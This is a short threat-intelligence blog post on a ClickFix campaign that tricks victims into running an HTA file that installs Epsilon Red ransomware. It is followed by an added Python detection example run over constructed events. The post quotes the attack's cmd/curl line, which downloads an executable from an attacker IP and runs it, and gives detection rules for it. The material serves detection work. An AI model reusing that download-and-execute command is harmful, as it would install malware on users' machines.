209. Threat Actors Leverage ClickFix to Deploy Epsilon Red Ransomware

Hello everyone!

Zero days without ClickFix. This time an adversary leveraged this technique to deploy Epsilon Red ransomware.

This time the "verification" process was a bit unusual: the victim had to save the copied data as an HTA file, run it, get the code from it, and paste that code into another window.

First, the HTA file runs a command that downloads and executes the Epsilon Red payload:

cmd /c cd /D %userprofile% && curl -s -o a.exe hxxp://155.94.155[.]227:2269/dw/vir.exe && a.exe

Next, it provides the "code":

cmd /c echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && pause

And here we have an interesting detection opportunity:

event_type: "processcreatewin"

AND

proc_file_path: "cmd.exe"

AND

cmdline: ("echo" AND "verificatification code")
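The query above expressed as a check over constructed process-creation events (an added example, not code from the post). Field names follow the query; it also goes beyond the post by adding a second rule derived from the first command: cmd.exe running curl -o and then executing the file it just downloaded.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    event_type: str      # e.g. "processcreatewin", as in the post's query
    proc_file_path: str  # image path of the created process
    cmdline: str         # full command line

# Constructed sample telemetry: the two commands from the post plus benign
# look-alikes that must not fire.
SAMPLE_EVENTS = [
    ProcEvent("processcreatewin", r"C:\Windows\System32\cmd.exe",
              "cmd /c cd /D %userprofile% && curl -s -o a.exe "
              "hxxp://155.94.155[.]227:2269/dw/vir.exe && a.exe"),
    ProcEvent("processcreatewin", r"C:\Windows\System32\cmd.exe",
              "cmd /c echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && pause"),
    ProcEvent("processcreatewin", r"C:\Windows\System32\cmd.exe",
              "cmd /c echo Build finished && pause"),
    ProcEvent("processcreatewin", r"C:\Windows\System32\cmd.exe",
              "cmd /c curl -s -o report.json https://internal.example/api && type report.json"),
]

def _cmd_create(ev: ProcEvent) -> bool:
    return (ev.event_type == "processcreatewin"
            and ev.proc_file_path.lower().endswith("cmd.exe"))

def fake_verification_code(ev: ProcEvent) -> bool:
    """The post's rule: cmd.exe echoing a 'verificatification code' (sic)."""
    cl = ev.cmdline.lower()
    return _cmd_create(ev) and "echo" in cl and "verificatification code" in cl

# curl ... -o <file> anywhere in the command line, capturing the output name
_CURL_OUT = re.compile(r"\bcurl\b[^&]*?\s-o\s+(\S+)", re.IGNORECASE)

def download_then_execute(ev: ProcEvent) -> bool:
    """Broader rule: cmd.exe runs curl -o <file> and later in the same command
    line executes that same file ('&& <file>')."""
    if not _cmd_create(ev):
        return False
    m = _CURL_OUT.search(ev.cmdline)
    if not m:
        return False
    name = re.escape(m.group(1))
    rest = ev.cmdline[m.end():]
    return re.search(r"&&\s*(?:\.\\)?" + name + r"\b", rest, re.IGNORECASE) is not None

def triage(events):
    """Return [(event_index, rule_name), ...] for every event a rule matches."""
    hits = []
    for i, ev in enumerate(events):
        for rule in (fake_verification_code, download_then_execute):
            if rule(ev):
                hits.append((i, rule.__name__))
    return hits

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {SAMPLE_EVENTS[idx].cmdline}")
```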

See you tomorrow!
